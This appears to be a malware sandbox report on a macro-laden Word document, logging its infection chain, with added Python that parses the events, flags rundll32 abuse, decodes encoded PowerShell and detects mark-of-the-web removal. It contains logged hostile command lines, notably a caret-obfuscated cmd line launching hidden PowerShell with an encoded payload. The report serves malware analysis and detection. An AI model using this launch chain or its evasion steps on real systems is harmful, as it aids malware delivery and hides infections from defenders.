                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0.u..............EQ.....<.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....@.................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v....h.......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.....r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....(.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......T..j....0IQ...............J.............}..v............0.u..............EQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....p.................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4i.j....E.................J.............}..v....X.......0.u.............H.Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4i.j....E.................J.............}..v.....5......0.u.............H.Q.............................
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: Arch_2021_717-1562532.doc Virustotal: Detection: 16%
Source: Arch_2021_717-1562532.doc ReversingLabs: Detection: 27%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
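The process-creation lines above describe the whole chain: WINWORD.EXE spawns cmd.exe through WMI, cmd.exe runs msg.exe (the fake error box) and a hidden PowerShell, PowerShell drops N49I.dll and hands it to the 64-bit rundll32.exe, which re-launches the 32-bit rundll32.exe, and from there the module is moved under a random folder in SysWOW64 with a non-DLL extension and invoked by ordinal (#1) and by a random export name. The following Python is an added example, not part of the sandbox report or the Emotet sample: it parses lines reproduced from this report (with a space restored between the source process and the event; the redacted -enc payload stays redacted) into parent/child records and applies the rundll32 heuristics that the chain above makes visible. The hand-rolled argument splitter and the extension and path lists are assumptions of this example, not sandbox logic.

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Process-creation events as recorded in this report, in the sandbox's own
# "Source: <parent> Process created: <child image> <command line>" shape.
# The -enc payload is redacted on the page and stays redacted here.
REPORT_LINES = [
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc <redacted>",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString",
    r"Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1",
]

LINE_RE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.exe)\s+(?P<cmdline>.*)$",
    re.IGNORECASE,
)

# Extensions rundll32 legitimately loads (assumed list); anything else is worth a look.
DLL_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _take_token(text: str) -> Tuple[str, str]:
    """Split off one argument: a quoted string, or a run up to a comma or space."""
    text = text.lstrip()
    if text[:1] in ("'", '"'):
        end = text.index(text[0], 1)
        return text[1:end], text[end + 1:]
    m = re.match(r"[^,\s]*", text)
    return m.group(0), text[m.end():]


def parse_rundll32(cmdline: str) -> Tuple[str, Optional[str]]:
    """Return (module path, entry point) from a rundll32 command line.

    Accepts both "module,Export" and "module Export"; entry is None if absent.
    """
    _, rest = _take_token(cmdline)          # drop the rundll32 image itself
    module, rest = _take_token(rest)
    entry, _ = _take_token(rest.lstrip(" ,"))
    return module, entry or None


def rundll32_findings(module: str, entry: Optional[str]) -> List[str]:
    """Heuristics for the rundll32 abuse patterns visible in this report."""
    findings = []
    low = module.lower()
    ext = ntpath.splitext(low)[1]
    if ext not in DLL_EXTS:
        findings.append(f"module has non-DLL extension {ext or '(none)'}")
    if entry and re.fullmatch(r"#\d+", entry):
        findings.append(f"export called by ordinal {entry}")
    if low.startswith("c:\\users\\"):
        findings.append("module loaded from a user-writable path")
    for d in SYSTEM_DIRS:
        # System DLLs live directly in System32/SysWOW64; a module inside a
        # subfolder there (Kvmkgtcj, Unxqf, ...) is a drop location.
        if low.startswith(d) and "\\" in low[len(d):]:
            findings.append("module in a subdirectory of a system directory")
    return findings


def analyse_report(lines: List[str]) -> List[Dict[str, object]]:
    """Parse each process-creation line and attach rundll32 findings."""
    results: List[Dict[str, object]] = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        rec: Dict[str, object] = {
            "parent": m["parent"], "image": m["image"], "cmdline": m["cmdline"], "findings": [],
        }
        if ntpath.basename(m["image"]).lower() == "rundll32.exe":
            rec["findings"] = rundll32_findings(*parse_rundll32(m["cmdline"]))
        results.append(rec)
    return results


if __name__ == "__main__":
    for rec in analyse_report(REPORT_LINES):
        flags = "; ".join(rec["findings"]) or "-"
        print(f"{ntpath.basename(rec['parent'])} -> {ntpath.basename(rec['image'])}: {flags}")
```

The report carries no PIDs, so records are keyed by image path rather than reconstructed into a true tree; on a host with Sysmon event 1 or Windows 4688 data the same heuristics apply per event, with ParentProcessId giving the real lineage. The "subdirectory of a system directory" rule will fire on legitimate modules under folders such as System32\wbem and needs an allow-list before it is used as an alert.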
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp

                      Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Arch_2021_717-1562532.doc Stream path 'Macros/VBA/Gusca95luq_': High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
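The cmd.exe line above uses two layers of obfuscation: cmd.exe caret escapes (m^s^g, p^owe^rs^he^ll^, -^e^nc), which the parser strips before the child process ever sees them, and a base64 -EncodedCommand payload, which PowerShell decodes as UTF-16LE. The Python below is an added example (not from the sandbox or the sample) that undoes both: it removes carets the way cmd.exe does, finds the encoded switch by PowerShell's prefix-matching rule rather than the literal string "-enc", and decodes the payload. The base64 blob is constructed from a benign script, because the real payload is redacted in this report.

```python
import base64
from typing import Optional

# Constructed sample: the -enc payload in this report is redacted, so a
# benign UTF-16LE script is encoded here to stand in for it.
SAMPLE_SCRIPT = "Write-Host 'constructed sample payload'"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed command line modelled on the cmd.exe line in this report.
SAMPLE_CMDLINE = (
    "cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en "
    "th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + SAMPLE_B64
)


def decaret(cmdline: str) -> str:
    """Undo cmd.exe caret escaping.

    Outside double quotes a caret escapes the next character, so m^s^g is msg
    and ^^ is a literal caret; a caret at the very end escapes the line break
    and is dropped. Text inside double quotes is left alone, as cmd.exe does.
    """
    out = []
    in_quotes = False
    i = 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quotes = not in_quotes
            out.append(c)
        elif c == "^" and not in_quotes:
            if i + 1 < len(cmdline):
                out.append(cmdline[i + 1])
                i += 1
        else:
            out.append(c)
        i += 1
    return "".join(out)


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the argument of a -EncodedCommand switch, or None.

    powershell.exe matches switch names by prefix, so -e, -en, -enc, ... and
    -EncodedCommand are all accepted (case-insensitive); pwsh also takes -ec.
    Rules that only grep for the literal "-enc" miss the other spellings.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) > 1 and tok[0] in "-/":
            name = tok[1:].lower()
            if "encodedcommand".startswith(name) or name == "ec":
                return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE, not UTF-8."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def analyse(cmdline: str) -> dict:
    """Strip carets, locate the encoded switch and decode its payload."""
    plain = decaret(cmdline)
    enc = extract_encoded_command(plain)
    return {
        "deobfuscated": plain,
        "encoded_argument": enc,
        "decoded_script": decode_encoded_command(enc) if enc else None,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

Run against a real capture, decaret() should be applied to the cmd.exe command line only; the powershell.exe child already receives the cleaned arguments, which is why the sandbox logs it as a plain "powershell -w hidden -enc ...". The %username% variable is left unexpanded here because expansion happens in the spawning shell's environment, not in the text.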
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00180A90 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00169A06 push esi; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001700C8 push es; retn 0000h
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00452D98 push 00452E25h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460020 push 00460058h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00454038 push 00454064h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B2 push 0042A0E0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B4 push 0042A0E0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042B274 push 0042B2CDh; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043C34C push 0043C378h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004604F4 push 0046055Ch; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460498 push 004604EFh; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605F0 push 0046063Ch; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460580 push 004605ACh; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045B588 push 0045B5CAh; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605B8 push 004605E4h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460654 push 00460680h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004606C4 push 004606F0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D6DC push 0042D751h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046068C push 004606B8h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428748 push 00428774h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D754 push 0042D7ADh; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004607E4 push 00460827h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428798 push 004287C4h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004637A8 push 004637E0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00463848 push 00463874h; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046086C push 00460898h; ret

                      Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj

                      Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Unxqf\ouoi.jab:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh:Zone.Identifier read attributes | delete
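The four "File opened" lines above show rundll32.exe opening the Zone.Identifier alternate data stream of each relocated module with DELETE access, which is how the mark-of-the-web is removed (the same stream that Unblock-File or the "Unblock" checkbox deletes). The Python below is an added example, not sandbox or sample code: it parses a constructed Zone.Identifier stream in the [ZoneTransfer] INI format Windows writes, maps the ZoneId to its URLZONE name, and flags the report's ADS opens that request delete access. The stream content and URLs are constructed; the report lines are reproduced from above with a space restored between the source process and the event. Whether the dropped module ever carried the stream depends on the API that wrote it; the report shows only the delete attempts.

```python
import re
from typing import Dict, List

# Constructed Zone.Identifier stream in the format Windows writes for a file
# saved from the Internet zone (URLs are placeholders, not from the sample).
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/payload.bin\r\n"
)

# "File opened" / "File read" events as recorded in this report.
REPORT_FILE_LINES = [
    r"Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj:Zone.Identifier read attributes | delete",
    r"Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Unxqf\ouoi.jab:Zone.Identifier read attributes | delete",
    r"Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs:Zone.Identifier read attributes | delete",
    r"Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh:Zone.Identifier read attributes | delete",
    r"Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts",
]

# URLZONE values as used in the ZoneId field.
URLZONES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites", 3: "Internet", 4: "Restricted sites"}

FILE_OPEN_RE = re.compile(
    r"^Source: (?P<proc>.+?) File opened: (?P<path>.+?):Zone\.Identifier\s+(?P<access>.+)$"
)


def parse_zone_identifier(text: str) -> Dict[str, object]:
    """Parse the INI-style [ZoneTransfer] section of a Zone.Identifier stream."""
    section = None
    result: Dict[str, object] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "ZoneTransfer" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        result[key] = int(value) if key == "ZoneId" else value
    return result


def zone_name(zone_id: int) -> str:
    return URLZONES.get(zone_id, f"unknown ({zone_id})")


def motw_tamper_findings(lines: List[str]) -> List[Dict[str, str]]:
    """Flag opens of a Zone.Identifier stream that request DELETE access.

    Opening the ADS with DELETE is what removes the mark-of-the-web; a plain
    read of the stream (SmartScreen, Office Protected View) is not flagged.
    """
    findings = []
    for line in lines:
        m = FILE_OPEN_RE.match(line)
        if not m:
            continue
        access = {a.strip().lower() for a in m["access"].split("|")}
        if "delete" in access:
            findings.append({"process": m["proc"], "path": m["path"], "access": m["access"]})
    return findings


if __name__ == "__main__":
    zone = parse_zone_identifier(SAMPLE_STREAM)
    print(f"ZoneId {zone['ZoneId']} = {zone_name(zone['ZoneId'])}, host {zone.get('HostUrl')}")
    for f in motw_tamper_findings(REPORT_FILE_LINES):
        print(f"{f['process']} removed MOTW from {f['path']} ({f['access']})")
```

On a live host the equivalent telemetry is Sysmon event 15 (FileCreateStreamHash) for the stream being written and a file-open or delete event with the ":Zone.Identifier" suffix for its removal; the ReferrerUrl and HostUrl fields, when present, are the download origin and are worth preserving before anything deletes the stream.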
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 552 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00401D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_001612C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00711D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002612C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00341D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001F12C1 mov eax, dword ptr fs:[00000030h]
